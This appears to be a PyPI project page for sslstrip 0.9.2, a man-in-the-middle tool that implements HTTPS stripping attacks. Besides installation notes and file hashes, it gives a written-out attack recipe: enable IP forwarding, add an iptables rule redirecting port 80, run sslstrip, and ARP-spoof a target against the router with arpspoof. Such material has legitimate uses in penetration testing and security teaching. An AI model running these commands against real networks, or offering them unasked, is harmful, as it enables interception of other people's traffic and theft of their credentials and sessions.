A MITM tool that implements Moxie Marlinspike's HTTPS stripping attacks.
Project description
sslstrip is a MITM tool that implements Moxie Marlinspike’s SSL stripping attacks.
It requires Python 2.5 or newer, along with the ‘twisted’ python module.
- Installing:
pip install sslstrip
- Running:
sslstrip can be run from the source base without installation. Just run ‘python sslstrip.py -h’ as a non-root user to get the command-line options.
The four steps to getting this working (assuming you’re running Linux) are:
Flip your machine into forwarding mode (as root): echo “1” > /proc/sys/net/ipv4/ip_forward
Setup iptables to intercept HTTP requests (as root): iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <yourListenPort>
Run sslstrip with the command-line options you’d like (see above).
Run arpspoof to redirect traffic to your machine (as root): arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>
- More Info:
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
File details
Details for the file sslstrip-0.9.2.tar.gz.
File metadata
- Download URL: sslstrip-0.9.2.tar.gz
- Upload date:
- Size: 9.2 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 | efd5a3d10f1189e49b5ed038b01d8ae559dee245807970099e58940c55b28277 |
|
| MD5 | b0fd34a39cc40b314849a5b8b10edd07 |
|
| BLAKE2b-256 | 1802bad7817d167ad2547bbddaefa1d31d3a06857f5e7829f494dbd2d6abdf8e |
